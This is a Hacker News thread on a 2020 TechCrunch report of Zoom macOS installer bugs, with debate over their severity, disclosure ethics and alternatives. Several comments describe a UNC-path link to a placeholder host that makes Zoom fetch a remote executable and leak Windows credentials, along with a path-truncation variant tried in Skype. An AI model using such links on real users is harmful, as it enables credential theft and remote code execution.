
Ex-NSA hacker drops zero-day for Zoom - yarapavan
https://techcrunch.com/2020/04/01/zoom-doom/
======
Spooky23
__FOR IMMEDIATE RELEASE Zoom Zero Day __

Spooky23, a former guest of a Holiday Inn also used by elite NSA Hackers,
discovered that if you walk into a remote worker 's home while they are
engaged and distracted by a Zoom meeting, you can physically pick up the
laptop and throw it out the window. In most cases, this will result in a
denial of service.

Zoom has not made a fix available at this time. Users can work around this
threat by securing any nearby windows.

~~~
CivBase
This is funny, but I don't think the issue should be so quickly dismissed.

The machine must already be compromised for this vulnerability to be useful,
but doesn't necessarily mean it isn't a problem. A good security model uses
layers to reduce the impact of successful attacks. This vulnerability
potentially enables an attacker to escalate their privileges, bypassing some
of those layers and compromising the machine further.

This article probably overstates the problem (maybe don't use "doom" in the
headline next time, even though it rhymes) and there are plenty of examples of
worse vulnerabilities, but that doesn't excuse this one.

~~~
richardwhiuk
The vulnerability here is surely in Mac OS X though?

~~~
Wowfunhappy
No it's not. Mac OS X is allowing a program that was given root permissions to
execute code with root permissions.

------
duxup
This seems like a security bug, but not exactly a high risk one considering it
requires you to actually have possession of the computer.

Presumably if you have possession of the computer and are able to exploit this
bug, you could do any number of other things anyway...

Zoom might have issues but if I were to list them, this wouldn't be high on /
make the list. Obviously they should fix it, but of all the things, not sure
this one is front page worthy.

~~~
user5994461
This should be exploitable on the local network. This is a network share
vulnerability.

I suspect there was a nasty mis-translation. The article should have said
"local network", but it was strip down to "local" and gets mis-interpreted as
"local computer".

~~~
saagarjha
I don't see anything to do with network shares?

~~~
user5994461
First paragraph: two security researchers finding a Zoom bug that can be
abused to steal Windows passwords...

[https://twitter.com/hackerfantastic/status/12451333712626196...](https://twitter.com/hackerfantastic/status/1245133371262619654)

------
luma
Shitting on zoom in your headline appears to be this week's low latency path
to more clicks, no matter how contrived the claim is.

~~~
BoysenberryPi
I'm typically very out of the loop on things but is there any particular
reason HN seems to be hell bent on shitting on Zoom this week. Don't recall
seeing this much vitriol for a particular product in a while.

~~~
remcob
Due to quarantine remote working, a lot of people are obliged to use Zoom. To
some Zoom has a reputation of not taking security seriously, so they feel
forced to compromise the security of their computers. Personally I think this
reputation is justified.

You can access Zoom meetings through a pure web interface without installing
anything. The experience is somewhat reduced.

~~~
zeeZ
And to get to the pure web interface you'll have to either know the magic URL
or fight some more dark patterns, because they really want you to install
their software.

------
user5994461
This is linking to a source on twitter
[https://twitter.com/hackerfantastic/status/12451333712626196...](https://twitter.com/hackerfantastic/status/1245133371262619654)
with a short demo on youtube
[https://www.youtube.com/watch?v=Om1w4DVkkEU](https://www.youtube.com/watch?v=Om1w4DVkkEU)

From what I can gather. You can send a message in zoom with a link like
"\\\host.example.com\calc.exe". Zoom will highlight it as a clickable link.

Assuming you can get the user to click it:

1) It will fetch the remote executable and run.

2) It transparently transmits windows authentication of the user to the remote
server, expecting a network share that may require authentication.

~~~
luma
You can also do the exact same thing in any messaging app.

~~~
user5994461
I don't think so. Other messaging apps don't parse strings starting with \\\
as links and if they do, they hopefully undo it for the .exe extension.

~~~
luma
Have you tried that?

Hangouts: \\\servername.tld\share doesn't parse as a UNC, instead becomes
clickable and brings up a browser to "servername.tld"

Skype for business: Does exactly what Zoom does, turns the entire thing into a
clickable link

MS Teams: Doesn't parse as clickable at all

That's all I have in front of me at the moment...

~~~
Dylan16807
> Does exactly what Zoom does, turns the entire thing into a clickable link

 _And_ runs it when you click on it?

~~~
luma
Just went and confirmed, in Skype for Business it does not launch the
executable but rather opens explorer to the share and highlights the .EXE. So,
anyone operating that share will still be passed your creds, but it doesn't
launch the executable.

Testing in zoom, it launches the OS prompt to confirm .exe launch. Tested in
Windows 10.

~~~
user5994461
Could you try skype with \\\servername.tld\path\file.exe\extra.text

There is a good chance it will run file.exe if they cut the end of the string
naively. :D

~~~
luma
Oh that is an interesting approach...

Skype for business threw an error: "Sorry, we couldn't open the link".

------
dewey
> The two bugs, Wardle said, can be launched by a local attacker — that’s
> where someone has physical control of a vulnerable computer.

~~~
monocasa
It's still a root privilege escalation.

~~~
sc3n3ry
LPE has always been trivial on OS X... for the longest time, the passwordless-
sudo timeout was not specific to the tty. So all you had to do was wait for
someone to use sudo, and you would be able to get root.

~~~
monocasa
Cool. Companies that go "I should use a LPE as part of my product" should
still be chastised.

------
jeroenhd
These are valid attacks for bypassing Gatekeeper on macOS, but they're not
root-level privilege escalations attacks (the user still needs to enter a
password) and they don't provide remote code execution.

It does show that whoever manages security at Zoom should go back to school
though. Operating system security features are not an obstacle but a tool.
Trying to work around them reminds me of the age of IE6 toolbars and "system
optimisers" who won't let you uninstall them.

------
antoncohen
> The two bugs, Wardle said, can be launched by a local attacker — that’s
> where someone has physical control of a vulnerable computer.

TechCrunch got this wrong. "Local" means local privilege escalation, as
opposed to "remote" code execution. They do not require physical access.

That being said, local privilege escalation on a single user computer where
that user is an admin (most Macs), isn't a massive problem in my mind. It
would allow malware, once run by the user, to bypass security prompts usually
required to elevate access.

~~~
angry_octet
If Zoom was done well it would be a confined app, and controlling the Zoom
process wouldn't give you access to everything the user has access too, let
alone allow easy root privesc. It's just rubbish software.

(WebEx is as bad if not worse.)

------
TechBro8615
> Zoom’s troubled year just got worse.

This is an odd way of describing a year in which Zoom's stock has doubled in
price.

------
saagarjha
Slightly better link: [https://objective-
see.com/blog/blog_0x56.html](https://objective-see.com/blog/blog_0x56.html)

------
corndoge
Wow, I can't believe an NSA employee doesn't care about responsible disclosure
/s

~~~
saagarjha
He’s a bit sensationalist, to be sure, but the bugs mentioned are ones that
should be fixed. (If rather trivial to find…)

~~~
ilikehurdles
Responsible disclosure means giving the developers a chance to fix the bugs
before blasting the methods all over techcrunch.

~~~
saagarjha
I am aware of what responsible disclosure is; Patrick Wardle doesn't really
care for it because he prefers writing up his blog posts as it gives him a
chance to speak. But even putting aside his personal flaws, Zoom should fix
these issues.

------
cojoke
> In the meanwhile, Wardle said, “if you care about your security and privacy,
> perhaps stop using Zoom.

I feel like that's really easy to say if you're not an enterprise/big tech
employee who has to use the product to maintain their employment during the
quarantine.

Are there any privacy solutions out there for those of us who are required to
use Zoom anyway?

~~~
munchbunny
I'm not sure if a VM is an option given the need for a camera. If it is, I
think that's a pretty good option.

By default I would recommend a dedicated laptop for Zoom. Don't use it for
anything else. Also shut the laptop down completely when it's not in use.

This means there won't be anything to snoop on, and the hardware will be
turned off when you aren't using it.

~~~
snazz
You can pass a USB device (including a camera) to a VM. Then you can make sure
that Zoom always has focus within the VM to protect yourself from the
attention tracking functionality.

------
mrpippy
The answer is to use the web client. Either put the ID into
[https://zoom.us/join](https://zoom.us/join), or someone else on HN said that
replacing '/j' with '/wc/join' in a URL will use the web client.

------
DangerousPie
I think zero days are irresponsible in the best of times but releasing
something like this when their devs are probably all busy just keeping their
much-needed service running in times of a global crisis just seems insane.

------
jedieaston
Something that wasn't clear ("non-privileged attacker") is whether or not
running the Zoom installer as a non-admin user would be sufficient for it to
use its elevation mischief somehow. From what I see, it can't, because
AuthorizationExecuteWithPrivileges requires an admin's credentials to do
anything. But if that were the case, can you use the mac Zoom client without
an admin's permission, or not?

If you don't need to give it admin credentials (and can just give it anyone's
non-special password instead) and it installs to /Applications without an
admin's permission, then there's a huge problem. If you do need to give it
admin credentials, this still needs to be fixed (urgently, as I'm sure there's
tons of one-off developer/designer macs that aren't monitored by IT and have
the Zoom client on them), but that would mean the security model on OS X
wasn't entirely broken by a badly written video conferencing installer.

------
saadalem
When I see much hate on a company, I know it's getting successful

------
mindfulplay
Why are startups born this way? Why optimize for growth and CTR etc. Is there
a world in which security and privacy focus (maybe sprinkle in, dare I say,
social good) could be funded from the start?

These companies presumably all pivot on going public and making a crapton of
money: couldn't they anticipate the need to respect the users longer term as
opposed to selling them like commodity to investors and advertisers?

The worst types are the ones that advertise how good and amazing they are, and
when the "tide goes out they are found swimming naked" as Buffett might say.

~~~
soared
No one in the real world (outside of the hn bubble) actually cares about
privacy, and only enterprise cares about security.

> need to respect the users longer term as opposed to selling them like
> commodity to investors and advertisers?

This is the opposite of the truth? There is no /market/ need to respect users,
the intention is to sell them to advertisers/etc. Your comment is just
conflating your personal (And hn's) moral views of privacy with how markets
actually work in the real world.

Edit - I don't mean to be a dick, but you can't just push your morals on the
world and say thats how the world should work.

~~~
thinkharderdev
I think this argument proves too much. It is true that most users don't care
or even understand the security and privacy issues in the software that they
use but that doesn't mean product developers shouldn't care. It is the precise
reason that product developers HAVE to care because they in fact understand
the danger (or should anyway) and should protect their users from them.

I could just as easily say that "users don't care whether we hash their
passwords in our database so why waste the CPU cycles" and I would be right.
The vast majority of users don't know anything about storing passwords
securely, but

1\. They absolutely care if their passwords get pilfered and used to access
their accounts. 2\. We still have an ethical responsibility to protect people
from dangers that we know full well can cause them harm even if they don't
understand what those dangers are.

~~~
soared
I agree, you make a good point. In that sense maybe privacy and security could
be a means to achieve something else that users do actually care about. (ex. I
don't want strangers in my zoom calls, so please make them secure)

------
djsumdog
> Zoom uses a "shady" technique — one that’s also used by Mac malware — to
> install the Mac app without user interaction

It reminds me of the Dropbox trick they used to get past the accessibility
restrictions. The implementation is different, but it's essentially to get
around all the limitations that Apple has been building into macos.

I feel like developers shouldn't have to fight the operating system.

------
peterwwillis
We're in a pandemic. Telecommunications are of paramount importance to people
working in emergency and others services throughout the world. So of course,
security and privacy are more paramount than ever. But by releasing more and
more "problems" with Zoom, it slowly forces organizations to abandon Zoom as a
telecommunications option. Eventually people will not be _allowed_ to use Zoom
to do their jobs, which will make those jobs even more difficult than they
already are. Social distancing by itself saves lives by keeping infection (and
thus death) rates down, and this software is a critical part of making that
work.

    
    
      > Because Wardle dropped detail of the vulnerabilities on his blog, Zoom
      > has not yet provided a fix. In the meanwhile, Wardle said,
      > “if you care about your security and privacy, perhaps stop using Zoom.”
    

_This is not the time to release 0-days in telecommunications software, people
need this software to save lives._

If you work in InfoSec, or just idle in random hacker channels, please push
back on this kind of behavior. It would be "irresponsible" at any other time,
but in this era, it's literally life-threatening.

~~~
saagarjha
If I was a hacker, I would be looking _real_ closely at Zoom since everyone is
using it right now.

------
user_50123890
If an attacker has physical access to a device, it should already be
considered compromised...

------
pastry90
There has to be some headline law where whenever someone claims to be an EX-{3
Letter Agency} hacker, their findings are inevitably mostly trash.

Wardle has done more to damage the reputation of the NSA than anyone else I'm
aware of.

------
burgerzzz
Can someone explain why I keep seeing Zoom on the frontpage? What sets it
apart from the rest that it gets discussed on HN so often recently? Is it a YC
company?

~~~
dang
It's a spinoff of the covid crisis. The rush to remote work has made Zoom much
more prominent than it was a few weeks ago. This has attracted a flood of
attention, so a lot of spotlights are trained on it right now. For the same
reason, we've been hearing all about ventilators lately [1]. That's not a
ventilator plot, it's article moths flocking to the spotlights.

With Zoom there are compounding factors. Software, video conferencing, video
conferencing software, and software businesses are all topics in HN's
wheelhouse—as is anything security or privacy related. There have been
security and privacy surprises (shall we say) with Zoom in the past, so people
are naturally hunting for more. Also, readers are primed to pattern-match any
new findings as part of the ongoing sequence. That's a strong multiplier.
Familiarity reactions—cache effects, if you like—magnify how much attention a
story attracts. There was a similar, though slower-motion, sequence of stories
about Facebook last year.

It's not a YC company.

When there's a major ongoing story, such as the current crisis, floods of
follow-up and copycat posts appear, since every website and media outlet wants
in on the action. After the Snowden deluge of 2013, we learned to moderate
these counter-cyclically, so that HN can surf the big waves without getting
totally sogged with repetition. The test for a new submission on a MOT
(Massive Ongoing Topic) is: does it contain SNI (Significant New Information)
[2]? If no, we downweight the MOT. If yes, we try to have one thread about
each SNI. I just made up those TLAs.

Zoom has become a MOT in its own right. You can tell that when objections like
[3..9] start cropping up. The question is: is the OP a SNI?

[1]
[https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...](https://hn.algolia.com/?dateRange=all&page=0&prefix=true&query=ventilat&sort=byDate&type=story)

[2]
[https://hn.algolia.com/?dateRange=all&page=0&prefix=false&qu...](https://hn.algolia.com/?dateRange=all&page=0&prefix=false&query=by%3Adang%20%22significant%20new%20information%22&sort=byDate&type=comment)

[3]
[https://news.ycombinator.com/item?id=22749596](https://news.ycombinator.com/item?id=22749596)

[4]
[https://news.ycombinator.com/item?id=22743303](https://news.ycombinator.com/item?id=22743303)

[5]
[https://news.ycombinator.com/item?id=22748549](https://news.ycombinator.com/item?id=22748549)

[6]
[https://news.ycombinator.com/item?id=22750059](https://news.ycombinator.com/item?id=22750059)

[7]
[https://news.ycombinator.com/item?id=22750251](https://news.ycombinator.com/item?id=22750251)

[8]
[https://news.ycombinator.com/item?id=22753810](https://news.ycombinator.com/item?id=22753810)

[9]
[https://news.ycombinator.com/item?id=22754138](https://news.ycombinator.com/item?id=22754138)

~~~
burgerzzz
Thank you for the detailed response, very interesting!

------
mcintyre1994
Heh, have Techcrunch hired a Register headline writer? :)

------
huslage
It’s totally fine to go find bugs, but we have CVEs and responsible disclosure
for a reason. This is irresponsible.

------
aequitas
Can we stop using and finding bugs in the close-source Zoom and direct that
effort to finding bugs in the open source Jitsi (or any other open source
solution) instead?

Even though it's free and open source there will be bugs and usability issues
that need to be solved. If we pool our effort right we can make open source
solution into "just works" solutions, reducing the need for companies like
Zoom.

------
annoyingnoob
And Zoom proponents at my office still don't care - its all about convenience
for most folks.

~~~
kristianc
For most folks, it really is about convenience.

If you propose a new videoconf solution, and the first time a C-suite or major
prospect joins the call the call buffers, or someone doesn't have the right
drivers installed, or someone doesn't know how to click the link - you are
absolutely getting hauled over the coals afterwards.

No one, at any company wants to get the "We're a technology company - why
can't we organize a video call?" line.

Convenience is often neglected by people proposing a privacy-conscious, self-
hosted FOSS alternative that merely requires you to install it from binary and
configure your own Digital Ocean droplet, but it really does matter.

~~~
thinkharderdev
This is absolutely true in practice, but there are degrees. Approximately 0
people are going to go full tinfoil hat and setup their own self-hosted FOSS
solution, but we absolutely should care if a product like Zoom does something
like, say, installs a local web server to bypass security controls on a user's
browser which can potentially open up any number of devastating remote
exploits that would be easy to exploit by any script-kiddy.

The fact that most users don't care is more reason why product developers HAVE
to care. I could just as easily say "only paranoid security people care if we
hash their passwords in our database so why waste the CPU cycles?" And I would
be right, the vast majority of users don't know anything about storing
passwords securely but they absolutely care whether their passwords get
pilfered by an attacker and used to compromise their account.

------
valuearb
Techcrunch disables the back button.

~~~
sharken
I fail to see how that is relevant, also the back button works for me (Firefox
on Windows).

------
dawnerd
Why do sites like Techcrunch think I'll stick around longer if they block the
back button?

------
LockAndLol
I guess it's time to respond to every thread shitting on zoom with: Just use
Jitsi Meet. [https://jitsi.org/jitsi-meet/](https://jitsi.org/jitsi-meet/)

It's free, it's open-source, and can be self-hosted.

------
chews
If this is NSA hacking... We've got some patriotic script kids.

------
logicallee
my comment on an earlier story:
[https://news.ycombinator.com/item?id=22748204](https://news.ycombinator.com/item?id=22748204)

------
vernie
Zoom seems to be enjoying a good, old-fashioned dogpile

------
starpilot
zoom zoom zoom

